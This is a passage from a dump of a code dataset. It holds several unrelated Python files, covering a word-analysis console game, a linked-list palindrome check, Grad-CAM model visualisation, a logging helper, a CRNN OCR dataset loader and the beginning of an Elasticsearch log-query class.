Program menu\nwhile True:\n print(\"\"\"\n Bienvenido a \u001b[32;1m'Descubre tu palabra'\u001b[0m\n 1.Iniciar programa \n 2.Salir\"\"\")\n opcion = int(input(\"Escoja una opcion: \"))\n\n if opcion == 1:\n # Prompt for the word\n palabra = str(input(\"Escriba una palabra: \"))\n\n # Loop to check whether the word contains characters other than letters\n while not palabra.isalpha():\n print(\"\\u001b[31;1mEl dato ingresado es incorrecto, intentelo de nuevo\\u001b[0m\")\n palabra = str(input(\"Escriba una palabra nuevamente: \"))\n\n if palabra.isalpha():\n # Loop to count consonants and vowels\n for i in palabra.lower():\n if (i == 'a') or (i == 'e') or (i == 'i') or (i == 'o') or (i == 'u'):\n vocales += 1\n else:\n consonantes += 1\n\n # Get the number of letters in the entered word\n numero_letras = len(palabra)\n\n # Loop to count how many times 
each letter is repeated\n for clave, valor in dict_alfabeto.items():\n for i in palabra:\n if i == clave:\n letras_repetidas += valor\n\n dict_letras_repetidas[clave] = letras_repetidas\n\n letras_repetidas = 0\n\n# ---------------------------------------------------------------------------------------------------------\n # Information about the entered word\n print(f\"\\nSu palabra es: \\u001b[36;1m{palabra} \\u001b[0m\")\n print(f\"Su palabra tiene {numero_letras} letras, {consonantes} consonantes y {vocales} vocales\")\n\n # Loop that shows how many times each letter is repeated\n for k, v in dict_letras_repetidas.items():\n if v != 0:\n if v == 1:\n print(f\"La letra: {k} se repite: {v} vez\")\n if v > 1:\n print(f\"La letra: {k} se repite: {v} veces\")\n\n# -------------------------------------------------------------------------------------------------------\n # Find the position of an entered letter\n print(\"\\n\\u001b[34;1mConozca la posición en que se encuentra una letra de la palabra ingresada\\u001b[0m\")\n letra = str(input('Ingrese una letra para conocer en que posición se encuentra: '))\n\n # Loop to validate the entered letter\n while letra not in palabra:\n print(\"\\u001b[31;1mEl dato ingresado no pertenece a la palabra ingresada intentelo de nuevo\\u001b[0m\")\n letra = str(input(\"Escriba una letra nuevamente: \"))\n\n if letra in palabra:\n # print(\"the letter DOES exist in the string\")\n print(f\"Palabra es: \\u001b[31;1m {palabra} \\u001b[0m y la letra ingresada \"\n f\"es: \\u001b[31;1m {letra}\\u001b[0m\\n\")\n\n # Loop to find the positions where the letter occurs in the entered word\n for i in range(len(palabra)):\n if letra == palabra[i]:\n print(f\"La letra \\u001b[31;1m {letra} \\u001b[0m se encuentra en la posicion: {i+1}\")\n\n # Reset the variables\n vocales = 0\n consonantes = 0\n elif opcion == 2:\n print(\"Saliendo del programa...\")\n break\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"237170870","text":"\"\"\"\nGiven a singly linked list, determine if it is a palindrome.\n\nExample 1:\n\nInput: 1->2\nOutput: false\nExample 2:\n\nInput: 1->2->2->1\nOutput: true\nFollow up:\nCould you do it in O(n) time and O(1) space\n\"\"\"\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\ndef is_palindrome(head):\n \"\"\"Runtime: 76 ms, faster than 78.65% of Python3 online submissions for Palindrome Linked List.\n\"\"\"\n start1 = head\n runner1 = head\n runner2 = head\n while runner2 and runner2.next:\n runner1 = runner1.next\n runner2 = runner2.next.next\n\n start2 = runner1.next if runner2 and runner2.next is None else runner1\n\n arr1, arr2 = [], []\n while start2:\n arr1.append(start1.val)\n arr2.append(start2.val)\n start1 = start1.next\n start2 = start2.next\n\n return arr1 == arr2[::-1]\n\nhead = ListNode(1)\nhead.next = ListNode(0)\nhead.next.next = ListNode(1)\nprint(is_palindrome(head))","sub_path":"9_training/LL_palindrome.py","file_name":"LL_palindrome.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"499702636","text":"import torch\nfrom torch.autograd import Variable\nfrom torch.autograd import Function\nfrom torchvision import models\nfrom torchvision import utils\nimport cv2\nimport os\nimport numpy as np\nimport argparse\nimport 
torch.nn.functional as F\nfrom OXFORD_IIIT.src.densenet_DIY import densenet_DIY_40,densenet_DIY_64,densenet_DIY_CliqueNet_s3,densenet_DIY_100\nfrom OXFORD_IIIT.src.build_model import CNNModel\nimport OXFORD_IIIT.cliqueNet_pytorch.cliquenet as cliquenet\nfrom OXFORD_IIIT.grad_cam.grad_cam_cliquenet import model_checkpoint_targetLayerName as clique_model_checkpoint_targetLayerName\nfrom OXFORD_IIIT.grad_cam.grad_cam_densenet40 import model_checkpoint_targetLayerName as densenet40_model_checkpoint_targetLayerName\n\ndef get_args():\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--use-cuda', action='store_true', default=True, help='Use NVIDIA GPU acceleration')\n\tparser.add_argument('--image-path', type=str, default='./database/examples/Birman_3.jpg', help='Input image path')\n\n\targs = parser.parse_args()\n\n\targs.use_cuda = args.use_cuda and torch.cuda.is_available()\n\tif args.use_cuda:\n\t\tprint(\"Using GPU for acceleration\")\n\telse:\n\t\tprint(\"Using CPU for computation\")\n\n\treturn args\n\ndef preprocess_image(img):\n\t'''\n\n\t:param img: : (224, 224, 3)\n\t:return:\n\t'''\n\tmeans=[0.485, 0.456, 0.406]\n\tstds=[0.229, 0.224, 0.225]\n\n\tpreprocessed_img = img.copy()[: , :, ::-1] # preprocessed_img : (224, 224, 3)\n\tfor i in range(3):\n\t\tpreprocessed_img[:, :, i] = preprocessed_img[:, :, i] - means[i]\n\t\tpreprocessed_img[:, :, i] = preprocessed_img[:, :, i] / stds[i]\n\tpreprocessed_img = np.ascontiguousarray(\n\t\tnp.transpose(preprocessed_img, (2, 0, 1))) # : (3, 224, 224)\n\tpreprocessed_img = torch.from_numpy(preprocessed_img) # torch.Size([3, 224, 224])\n\tpreprocessed_img.unsqueeze_(0) # torch.Size([1, 3, 224, 224])\n\tinput = Variable(preprocessed_img, requires_grad = True) # torch.Size([1, 3, 224, 224])\n\treturn input\n\ndef show_origin_image(img_path):\n\tfrom PIL import Image\n\timg_name = os.path.split(img_path)[-1].split('.')[0]\n\tviz.image(torch.from_numpy(np.asarray(\n\t\tImage.open(img_path).resize((255, 255), Image.ANTIALIAS))).permute(2, 0, 1),\n\t\t\t opts=dict(title=img_name))\n\ndef show_cam_on_image(img_path, mask, model_name, suffix='.png'):\n\timg = cv2.imread(img_path)\n\theight, width, _ = img.shape\n\t# heatmap = cv2.applyColorMap(np.uint8(255*mask), cv2.COLORMAP_JET) # resize back to the original image size and apply the colour map\n\theatmap = cv2.applyColorMap(cv2.resize(np.uint8(255*mask), (width, height)), cv2.COLORMAP_JET) # resize back to the original image size and apply the colour map\n\n\t# heatmap = np.float32(heatmap) / 255\n\tcam = heatmap + np.float32(img)\n\tcam = cam / np.max(cam)\n\t# saved_filepath = os.path.join(img_path.split('.')[0] + suffix)\n\t# cv2.imwrite(saved_filepath, np.uint8(255 * cam))\n\n\t# from PIL import Image\n\t# img_name = os.path.split(img_path)[-1].split('.')[0]\n\t# viz.image(torch.from_numpy(np.asarray(Image.open(img_path).resize((255, 255), Image.ANTIALIAS))).permute(2, 0, 1),opts=dict(title=img_name))\n\tnp_num = np.uint8(255 * cam)\n\ttorch_num = torch.from_numpy(np.uint8(255 * cam))\n\tviz.image(torch.from_numpy(cv2.resize(np.uint8(255 * cam), (255, 255))).permute(2, 0, 1),opts=dict(title=model_name))\n\t# viz.image(torch.from_numpy(cv2.resize(np.uint8(255 * cam), (255, 255))).permute(2, 1, 0),opts=dict(title=model_name))\n\nclass FeatureExtractor():\n\t'''\n\tClass for extracting activations and registering gradients from targeted intermediate layers\n\t'''\n\n\tdef __init__(self, model, target_layers):\n\t\tself.model = model\n\t\tself.target_layers = target_layers\n\t\tself.gradients = []\n\n\tdef save_gradient(self, grad): # grad\n\t\tself.gradients.append(grad)\n\n\tdef 
__call__(self, x):\n\t\toutputs = []\n\t\tself.gradients = []\n\t\tfor name, module in self.model._modules.items():\n\t\t\tx = module(x) # x's shape changes after each module(), e.g. torch.Size([1, 3, 224, 224]) → torch.Size([1, 64, 224, 224])\n\t\t\tif name in self.target_layers: # match the targeted intermediate layers\n\t\t\t\tx.register_hook(self.save_gradient) # registering gradients from targeted intermediate layers\n\t\t\t\toutputs += [x]\n\t\treturn outputs, x # x -- 'last_feature' # outputs -- 'match_features'\n\nclass ModelOutputs():\n\t'''\n\tClass for making a forward pass, and getting: (return)\n\t1. The network output. # output\n\t2. Activations from intermediate targeted layers. # target_activations\n\t3. Gradients from intermediate targeted layers. # self.feature_extractor.gradients\n\t'''\n\n\tdef __init__(self, model, target_layers):\n\t\tself.model = model\n\t\tself.feature_extractor = FeatureExtractor(self.model.features, target_layers) # __init__\n\n\tdef get_gradients(self):\n\t\treturn self.feature_extractor.gradients\n\n\tdef __call__(self, x):\n\t\ttarget_activations, output = self.feature_extractor(x) # x: feature # output -- last_feature torch.Size([1, 512, 7, 7]) / torch.Size([1, 2208, 7, 7])\n\t\tif 'DenseNet' in str(type(self.model)):\n\t\t\toutput = F.relu(output, inplace=True)\n\t\t\toutput = F.adaptive_avg_pool2d(output, (1, 1)).view(output.size(0), -1)\n\t\telse:\n\t\t\toutput = output.view(output.size(0), -1) # torch.Size([1, 25088])\n\t\toutput = self.model.classifier(output) # torch.Size([1, 1000])\n\n\t\treturn target_activations, output # target_activations {list} target_activations[0] torch.Size([1, 512, 14, 14]) # output torch.Size([1, 1000])\n\nclass GradCam():\n\tdef __init__(self, model, target_layer_names, use_cuda):\n\t\tself.model = model\n\t\tself.model.eval()\n\t\tself.cuda = use_cuda\n\t\tif self.cuda:\n\t\t\tself.model = model.cuda()\n\n\t\tself.extractor = ModelOutputs(self.model, target_layer_names) # __init__\n\n\tdef forward(self, input):\n\t\treturn self.model(input)\n\n\tdef __call__(self, input, index = None):\n\n\t\t'''\n\n\t\t:param input:\n\t\t:param index: # If None, returns the map for the highest scoring category.\n\t\t\t\t\t# Otherwise, targets the requested index.\n\t\t:return:\n\t\t'''\n\n\t\tif self.cuda:\n\t\t\t# features -- Activations from intermediate targeted layers.(target_activations) Ex. target_activations[0] torch.Size([1, 512, 14, 14])\n\t\t\t# output -- The network output. (last feature) Ex. 
\t\t\tfeatures, output = self.extractor(input.cuda()) # __call__\n\t\telse:\n\t\t\tfeatures, output = self.extractor(input)\n\n\t\tif index is None:\n\t\t\tindex = np.argmax(output.cpu().data.numpy())\n\n\t\tone_hot = np.zeros((1, output.size()[-1]), dtype = np.float32) # : (1, 1000)\n\t\tone_hot[0][index] = 1 # 'activate' the best-matching unit index\n\t\tone_hot = Variable(torch.from_numpy(one_hot), requires_grad = True)\n\t\tif self.cuda:\n\t\t\tone_hot = torch.sum(one_hot.cuda() * output)\n\t\telse:\n\t\t\tone_hot = torch.sum(one_hot * output)\n\n\t\tself.model.features.zero_grad() # clear stale gradients on both sub-networks\n\t\tself.model.classifier.zero_grad()\n\t\tone_hot.backward(retain_graph=True) # backprop only the selected class score\n\n\t\tgrads_val = self.extractor.get_gradients()[-1].cpu().data.numpy() # grads_val : (1, 512, 14, 14) # gradients torch.Size([1, 512, 14, 14])\n\n\t\ttarget = features[-1] # target torch.Size([1, 512, 14, 14]) # features[0] torch.Size([1, 512, 14, 14]) # last_conv\n\t\ttarget = target.cpu().data.numpy()[0, :] # : (512, 14, 14)\n\n\t\tweights = np.mean(grads_val, axis = (2, 3))[0, :] # : (512,) # the channel weights are the spatially averaged gradients\n\t\tcam = np.zeros(target.shape[1 : ], dtype = np.float32) # : (14, 14)\n\n\t\tfor i, w in enumerate(weights):\n\t\t\tcam += w * target[i, :, :] # target : (512, 14, 14) # the activation map is a weighted sum of the feature maps\n\n\t\tcam = np.maximum(cam, 0)\n\t\tcam = cv2.resize(cam, (224, 224))\n\t\tcam = cam - np.min(cam)\n\t\tcam = cam / np.max(cam) # normalize to [0, 1]\n\t\treturn cam\n\n# NOTE: GuidedBackpropReLU uses the old-style (pre-1.3) autograd.Function API with instance\n# methods; newer PyTorch requires static forward/backward methods taking a ctx argument.\nclass GuidedBackpropReLU(Function):\n\n\tdef forward(self, input):\n\t\tpositive_mask = (input > 0).type_as(input)\n\t\toutput = torch.addcmul(torch.zeros(input.size()).type_as(input), input, positive_mask)\n\t\tself.save_for_backward(input, output)\n\t\treturn output\n\n\tdef backward(self, grad_output):\n\t\tinput, output = self.saved_tensors\n\t\tgrad_input = None\n\n\t\tpositive_mask_1 = (input > 0).type_as(grad_output)\n\t\tpositive_mask_2 = (grad_output > 0).type_as(grad_output)\n\t\tgrad_input = torch.addcmul(torch.zeros(input.size()).type_as(input), torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output, positive_mask_1), positive_mask_2)\n\n\t\treturn grad_input\n\nclass GuidedBackpropReLUModel:\n\tdef __init__(self, model, use_cuda):\n\t\tself.model = model\n\t\tself.model.eval()\n\t\tself.cuda = use_cuda\n\t\tif self.cuda:\n\t\t\tself.model = model.cuda()\n\n\t\t# # replace ReLU with GuidedBackpropReLU\n\t\t# for idx, module in self.model.features._modules.items():\n\t\t# \tif module.__class__.__name__ == 'ReLU':\n\t\t# \t\tself.model.features._modules[idx] = GuidedBackpropReLU()\n\n\tdef forward(self, input):\n\t\treturn self.model(input)\n\n\tdef __call__(self, input, index = None):\n\t\tif self.cuda:\n\t\t\toutput = self.forward(input.cuda())\n\t\telse:\n\t\t\toutput = self.forward(input)\n\n\t\tif index is None:\n\t\t\tindex = np.argmax(output.cpu().data.numpy())\n\n\t\tone_hot = np.zeros((1, output.size()[-1]), dtype = np.float32)\n\t\tone_hot[0][index] = 1\n\t\tone_hot = Variable(torch.from_numpy(one_hot), requires_grad = True)\n\t\tif self.cuda:\n\t\t\tone_hot = torch.sum(one_hot.cuda() * output)\n\t\telse:\n\t\t\tone_hot = torch.sum(one_hot * output)\n\n\t\t# self.model.features.zero_grad()\n\t\t# self.model.classifier.zero_grad()\n\t\tone_hot.backward(retain_graph=True)\n\t\t# output.backward(gradient=one_hot)\n\n\t\toutput = input.grad.cpu().data.numpy() #: (1, 3, 224, 224)\n\t\toutput = output[0,:,:,:]\n\n\t\treturn output\n
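\n# --- Editor's aside (not in the original file): the per-channel loop in GradCam.__call__ is a\n# plain tensor contraction; a hedged, vectorized equivalent (helper name is hypothetical):\ndef weighted_cam(weights, target):\n\t'''weights: (C,), target: (C, H, W) -> (H, W); same math as the enumerate loop above.'''\n\treturn np.einsum('c,chw->hw', weights, target)\n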
\n\ndef model_checkpoint_targetLayerName(model, checkpoint_dirpath, target_layer_names):\n\t# load the most recently saved model checkpoint\n\ttry:\n\t\tlast_saved_model = sorted(os.listdir(checkpoint_dirpath))[-1]\n\t\tload_model_path = checkpoint_dirpath + last_saved_model\n\t\tif 'pkl' in last_saved_model:\n\t\t\tmodel.load_state_dict(torch.load(load_model_path))\n\t\t\tprint('load the saved %s successfully ~' % load_model_path)\n\texcept Exception as e:\n\t\tprint(e)\n\n\tmodel.eval()\n\t# print(model)\n\n\tgrad_cam = GradCam(model, target_layer_names, use_cuda=args.use_cuda)\n\n\treturn grad_cam\n\nif __name__ == '__main__':\n\n\t\"\"\" \n\tpython grad_cam.py \n\t1. Loads an image with opencv.\n\t2. Preprocesses it for the networks below and converts it to a pytorch variable.\n\t3. Makes a forward pass to find the category index with the highest score,\n\tand computes intermediate activations.\n\tMakes the visualization. \n\t\"\"\"\n\n\targs = get_args()\n\n\t# Single_CNN\n\tmodel = CNNModel()\n\tcheckpoint_dirpath = 'Results/model/cnn/batchsize_256/'\n\ttarget_layer_names = [\"31\"] # hooking the ReLU layer gives better maps\n\tgrad_cam_Single_CNN = model_checkpoint_targetLayerName(model,checkpoint_dirpath,target_layer_names)\n\n\t# DenseNet-40\n\tmodel = densenet_DIY_40()\n\tcheckpoint_dirpath = 'Results/model/DenseNet/densenet_DIY/depth_40_k_48/'\n\ttarget_layer_names = [\"norm5\"]\n\tgrad_cam_Densenet_40 = densenet40_model_checkpoint_targetLayerName(model,checkpoint_dirpath,target_layer_names)\n\n\t# DenseNet-100\n\tmodel = densenet_DIY_100()\n\tcheckpoint_dirpath = 'Results/model/DenseNet/densenet_DIY/depth_100_k_32/'\n\ttarget_layer_names = [\"norm5\"]\n\tgrad_cam_Densenet_100 = model_checkpoint_targetLayerName(model, checkpoint_dirpath, target_layer_names)\n\n\t# CliqueNet_S3\n\tmodel = cliquenet.build_cliquenet(input_channels=64, list_channels=[40, 80, 160, 160], list_layer_num=[6, 6, 6, 6], if_att= True) # block_num = 4 # S3\n\t# model = cliquenet.build_cliquenet(input_channels=64, list_channels=[36, 64, 100, 80], list_layer_num=[5, 6, 6, 6], if_att= True) # block_num = 4 # S0\n\tcheckpoint_dirpath = 'Results/model/build_cliquenet/s3_new/'\n\ttarget_layer_names = [\"fc\"]\n\tgrad_cam_CliqueNet_s3 = clique_model_checkpoint_targetLayerName(model, checkpoint_dirpath, target_layer_names)\n\n\t# Densenet161\n\tmodel = models.densenet161(pretrained=True)\n\tnum_ftrs = model.classifier.in_features\n\tmodel.classifier = torch.nn.Linear(num_ftrs, 37)\n\tcheckpoint_dirpath = 'Results/model/DenseNet/densenet161/'\n\ttarget_layer_names = [\"norm5\"]\n\tgrad_cam_Densenet_161 = model_checkpoint_targetLayerName(model,checkpoint_dirpath,target_layer_names)\n\n\n\tgrad_cams = {'Single_CNN': grad_cam_Single_CNN, 'densenet-40': grad_cam_Densenet_40,\n\t\t\t\t 'DenseNet-100':grad_cam_Densenet_100,'Densenet161':grad_cam_Densenet_161,'CliqueNet-S3':grad_cam_CliqueNet_s3}\n\n\t# Input (image)\n\timages = []\n\tval_dir_path = '/home/captain/Desktop/Graduation_Project/OXFORD_IIIT/database/data_breeds/val'\n\tfor val_breeds_dir_name in os.listdir(val_dir_path):\n\t\tval_breeds_dir_path = os.path.join(val_dir_path, val_breeds_dir_name)\n\t\tfor img_filename in os.listdir(val_breeds_dir_path):\n\t\t\timg_path = os.path.join(val_breeds_dir_path, img_filename)\n\t\t\timages.append(img_path)\n\n\tfrom visdom import Visdom\n\tviz = Visdom(env='Models-Grad-CAM')\n\timage_so_far = 0\n\tfor image_path in images:\n\n\t\tprint(image_so_far, image_path)\n\t\tif image_so_far == 100:\n\t\t\tbreak\n\n\t\timage_so_far += 1\n\t\timg = cv2.imread(image_path, 1) # : (224, 224, 3)\n\t\timg = np.float32(cv2.resize(img, (224, 224))) / 255 # : (224, 224, 3)\n\t\tinput = 
preprocess_image(img) # input torch.Size([1, 3, 224, 224])\n\n\t\t# If None, returns the map for the highest scoring category.\n\t\t# Otherwise, targets the requested index.\n\t\ttarget_index = None\n\n\t\tshow_origin_image(image_path)\n\t\tfor key_i in grad_cams:\n\t\t\tgrad_cam = grad_cams[key_i]\n\t\t\tmask = grad_cam(input, target_index) # __call__\n\t\t\tshow_cam_on_image(image_path, mask, key_i)\n\n\n\t\t# gb_model = GuidedBackpropReLUModel(model, use_cuda=args.use_cuda)\n\t\t# gb = gb_model(input, index=target_index)\n\t\t# utils.save_image(torch.from_numpy(gb*255), 'gb.jpg')\n\t\t#\n\t\t# cam_mask = np.zeros(gb.shape) # : (3, 224, 224)\n\t\t# for i in range(0, gb.shape[0]):\n\t\t# \tcam_mask[i, :, :] = mask\n\t\t#\n\t\t# # cam_gb = np.multiply(cam_mask, gb) # element-wise product\n\t\t# cam_gb = np.multiply(mask, gb) # element-wise product\n\t\t# utils.save_image(torch.from_numpy(cam_gb*255), 'cam_gb.jpg')\n","sub_path":"OXFORD_IIIT/grad-cam-models.py","file_name":"grad-cam-models.py","file_ext":"py","file_size_in_byte":13828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"70054619","text":"# coding: utf-8\n__author__ = 'Harald Floor Wilhelmsen'\n\n\nclass LogSolution:\n    def __init__(self, log_files, standard_file_name):\n        \"\"\"\n        Initializes the log-object\n        :param log_files: A list of *file*-names without extensions.\n        Log-files with these names will be created in /var/log.\n        \"\"\"\n        # kept per-instance; a class-level dict would be shared by every instance\n        self.log_files = {}\n        for file_name in log_files:\n            self.log_files[file_name] = '/var/log/{}.log'.format(file_name)\n        self.log_files['standard_log_file'] = '/var/log/{}.log'.format(standard_file_name)\n\n    def log(self, entry, log_file_name, print_entry=True):\n        if print_entry:\n            print(entry)\n        with open(self.log_files[log_file_name], 'a') as log_file:\n            log_file.write(entry + '\\n')\n","sub_path":"userscripts/tihldelib/logsolution.py","file_name":"logsolution.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
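# --- Editor's aside: a hypothetical use of LogSolution above (needs write access to /var/log):\n#   logger = LogSolution(['access', 'errors'], 'app')\n#   logger.log('service started', 'access')  # prints and appends to /var/log/access.log\n#   logger.log('quiet entry', 'standard_log_file', print_entry=False)\n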
{"seq_id":"169003189","text":"#!/usr/bin/python\n# encoding: utf-8\n\nimport random\nimport torch\nfrom torch.autograd import Variable\n\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import sampler\nimport torchvision.transforms as transforms\nimport six\nimport sys\nimport lmdb  # needed by lmdbDataset below\nfrom PIL import Image\nimport numpy as np\nfrom data_generator import FakeTextDataGenerator\nimport os\n\n\nwith open('../gen_data/poem_pure.txt','r',encoding='utf-8') as text:\n    poem = [i.split('\\n')[0] for i in text.readlines()]\n    poem_len = len(poem)-1\n\nwith open('../gen_data/idiom_pure.txt','r',encoding='utf-8') as text:\n    idiom = [i.split('\\n')[0] for i in text.readlines()]\n    idiom_len = len(idiom)-1\n\nfonts_list = os.listdir('../gen_data/TextRecognitionDataGenerator/fonts')\n\npics = os.listdir('../gen_data/TextRecognitionDataGenerator/img')\nbgs = []\nfor i in pics:\n    bgs.append(Image.open('../gen_data/TextRecognitionDataGenerator/img/'+i))\n\n\n# randomly pick a snippet of up to `quantity` characters from the text corpus\ndef sto_choice_from_info_str(quantity=10):\n    if random.random() > (4/quantity):\n        text = poem[random.randint(0,poem_len)]\n        start = random.randint(0, len(text) - quantity)\n        return text[start:start+random.randint(int(quantity*0.8),quantity)]\n    else:\n        return idiom[random.randint(0,idiom_len)]\n\nclass genDataset(Dataset):\n    def __init__(self, transform=None, target_transform=None):\n        self.nSamples = 1000000\n        # NOTE: the transform argument is currently ignored; a fixed ToTensor pipeline is kept here\n        self.transform = transforms.Compose([transforms.ToTensor()])\n        self.target_transform = target_transform\n\n    def __len__(self):\n        return self.nSamples\n\n    def __getitem__(self, index):\n        assert index <= len(self), 'index range error'\n\n        text = sto_choice_from_info_str(10)\n\n        font = random.sample(fonts_list, 1)[0]\n        font = os.path.join('../gen_data/TextRecognitionDataGenerator/fonts', font)\n\n        size = 48\n        width = size * 10\n\n        skewing_angle = random.randint(0, 5)\n\n        blur = random.random() / 2\n\n        background_type = 3\n\n        distorsion_type = random.randint(0, 2)\n        distorsion_orientation = random.randint(0, 2)\n\n        alignment = random.randint(0, 2)\n\n        text_color = '#000000'\n\n        orientation = 1\n        space_width = 1\n\n        bg = random.sample(bgs,1)[0]\n\n        img = FakeTextDataGenerator.generate(text,font,size,skewing_angle,background_type,\n            distorsion_type,distorsion_orientation,width,alignment,text_color,orientation,space_width,bg,blur)\n\n        # img = self.transform(img)\n\n        label = text\n\n        if self.target_transform is not None:\n            label = self.target_transform(label)\n\n        return (img, label)\n\n\nclass lmdbDataset(Dataset):\n\n    def __init__(self, root=None, transform=None, target_transform=None):\n        # restored: self.env was never assigned in this copy; a read-only environment is the usual setup\n        self.env = lmdb.open(\n            root,\n            max_readers=1,\n            readonly=True,\n            lock=False,\n            readahead=False,\n            meminit=False)\n        if not self.env:\n            print('cannot creat lmdb from %s' % (root))\n            sys.exit(0)\n\n        with self.env.begin(write=False) as txn:\n\n            str = 'num-samples'\n            nSamples = int(txn.get(str.encode()))\n            self.nSamples = nSamples\n\n        self.transform = transform\n        self.target_transform = target_transform\n\n    def __len__(self):\n        return self.nSamples\n\n    def __getitem__(self, index):\n        assert index <= len(self), 'index range error'\n        index += 1\n        with self.env.begin(write=False) as txn:\n            img_key = 'image-%09d' % index\n            imgbuf = txn.get(img_key.encode())\n\n            buf = six.BytesIO()\n            buf.write(imgbuf)\n            buf.seek(0)\n            try:\n                img = Image.open(buf).convert('L')\n            except IOError:\n                print('Corrupted image for %d' % index)\n                return self[index + 1]\n\n            if self.transform is not None:\n                img = self.transform(img)\n\n            label_key = 'label-%09d' % index\n            label = txn.get(label_key.encode())\n\n            if self.target_transform is not None:\n                label = self.target_transform(label)\n\n        return (img, label)\n\n\nclass resizeNormalize(object):\n\n    def __init__(self, size, interpolation=Image.BILINEAR):\n        self.size = size\n        self.interpolation = interpolation\n        self.toTensor = transforms.ToTensor()\n\n    def __call__(self, img):\n        img = img.resize(self.size, self.interpolation)\n        img = self.toTensor(img)\n        img.sub_(0.5).div_(0.5)\n        return img\n\n\nclass randomSequentialSampler(sampler.Sampler):\n\n    def __init__(self, data_source, batch_size):\n        self.num_samples = len(data_source)\n        self.batch_size = batch_size\n\n    def __iter__(self):\n        n_batch = len(self) // self.batch_size\n        tail = len(self) % self.batch_size\n        index = torch.LongTensor(len(self)).fill_(0)\n        for i in range(n_batch):\n            random_start = random.randint(0, len(self) - self.batch_size)\n            batch_index = random_start + torch.arange(0, self.batch_size)  # torch.range is deprecated\n            index[i * self.batch_size:(i + 1) * self.batch_size] = batch_index\n        # deal with tail\n        if tail:\n            random_start = random.randint(0, len(self) - self.batch_size)\n            tail_index = random_start + torch.arange(0, tail)\n            index[n_batch * self.batch_size:] = tail_index  # was (i + 1), which is undefined when n_batch == 0\n\n        return iter(index)\n\n    def __len__(self):\n        return self.num_samples\n\n\nclass alignCollate(object):\n\n    def __init__(self, imgH=32, imgW=256, keep_ratio=False, min_ratio=1,cuda=None):\n        self.imgH = imgH\n        self.imgW = imgW\n        self.keep_ratio = keep_ratio\n        self.min_ratio = min_ratio\n        self.cuda = cuda\n\n    def __call__(self, batch):\n        images, labels = zip(*batch)\n        imgH = self.imgH\n        imgW = self.imgW\n        if 
self.keep_ratio:\n            ratios = []\n            for image in images:\n                w, h = image.size\n                ratios.append(w / float(h))\n            ratios.sort()\n            max_ratio = ratios[-1]\n            imgW = int(np.floor(max_ratio * imgH))\n            imgW = max(imgH * self.min_ratio, imgW)  # ensure imgW >= imgH * min_ratio\n\n        transform = resizeNormalize((imgW, imgH))\n        images = [transform(image) for image in images]\n        images = torch.cat([t.unsqueeze(0) for t in images], 0)\n        return images, labels\n","sub_path":"CRNN/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
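# --- Editor's aside: a hypothetical way to wire the pieces above together; alignCollate serves as\n# the collate_fn because genDataset yields variable-width images:\n#   from torch.utils.data import DataLoader\n#   loader = DataLoader(genDataset(), batch_size=32,\n#                       collate_fn=alignCollate(imgH=32, imgW=256, keep_ratio=True))\n#   images, labels = next(iter(loader))  # images: one resized, normalized tensor batch\n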
{"seq_id":"320206996","text":"\"\"\"\nRun queries against Kibana's elasticsearch\n@see http://elasticsearch-py.readthedocs.org/en/master/\n\"\"\"\nimport json\nimport logging\nimport time\n\nfrom datetime import datetime\nfrom dateutil import tz\n\nfrom elasticsearch import Elasticsearch\n\nimport config\n\n\nclass KibanaError(Exception):\n    pass\n\n\nclass Kibana(object):\n    \"\"\" Interface for querying Kibana's storage \"\"\"\n\n    # give 5 seconds for all log messages to reach logstash and be stored in elasticsearch\n    SHORT_DELAY = 5\n\n    # seconds in 24h, used to get the es index for yesterday\n    DAY = 86400\n\n    def __init__(self, since=None, period=900):\n        \"\"\"\n        :arg since: UNIX timestamp data should be fetched since\n        :arg period: period (in seconds) before now() to be used when since is empty (defaults to last 15 minutes)\n        \"\"\"\n        self._es = Elasticsearch(hosts=config.ELASTICSEARCH_HOSTS)\n        self._logger = logging.getLogger('kibana')\n\n        # if no timestamp provided, fall back to now() in UTC\n        now = int(time.time())\n\n        if since is None:\n            since = now - period\n        else:\n            since += 1\n            self._logger.info(\"Using provided {:d} timestamp as since ({:d} seconds ago)\".format(since, now - since))\n\n        self._since = since\n        self._to = now - self.SHORT_DELAY  # give logs some time to reach Logstash\n\n        # Elasticsearch indices to query, from today and yesterday\n        self._index = ','.join([\n            self.format_index(now-self.DAY),\n            self.format_index(now),\n        ])\n\n        self._logger.info(\"Using {} indices\".format(self._index))\n        self._logger.info(\"Querying for messages from between {} and {}\".\n                          format(self.format_timestamp(self._since), self.format_timestamp(self._to)))\n\n    @staticmethod\n    def format_index(ts):\n        # ex. logstash-2014.07.08\n        tz_info = tz.tzutc()\n        return \"logstash-%s\" % datetime.fromtimestamp(ts, tz=tz_info).strftime('%Y.%m.%d')\n\n    @staticmethod\n    def format_timestamp(ts):\n        \"\"\"\n        Format the UTC timestamp for Elasticsearch,\n        e.g. 2014-07-09T08:37:18.000Z\n\n        @see https://docs.python.org/2/library/time.html#time.strftime\n        \"\"\"\n        tz_info = tz.tzutc()\n        return datetime.fromtimestamp(timestamp=ts, tz=tz_info).strftime(\"%Y-%m-%dT%H:%M:%S.000Z\")\n\n    def _get_timestamp_filter(self):  # renamed from _get_timestamp_filer (typo)\n        return {\n            \"range\": {\n                \"@timestamp\": {\n                    \"from\": self.format_timestamp(self._since),\n                    \"to\": self.format_timestamp(self._to)\n                }\n            }\n        }\n\n    def _search(self, body, limit=0):\n        \"\"\"\n        Perform the search and return raw rows\n\n        :arg body: query JSON body\n        :arg limit: how many rows to return\n        :return: raw rows\n        \"\"\"\n        body.setdefault(\"filter\", self._get_timestamp_filter())\n        body.setdefault(\"size\", limit)\n\n        self._logger.debug(\"Running {} query (limit set to {:d})\".format(json.dumps(body), body.get('size', 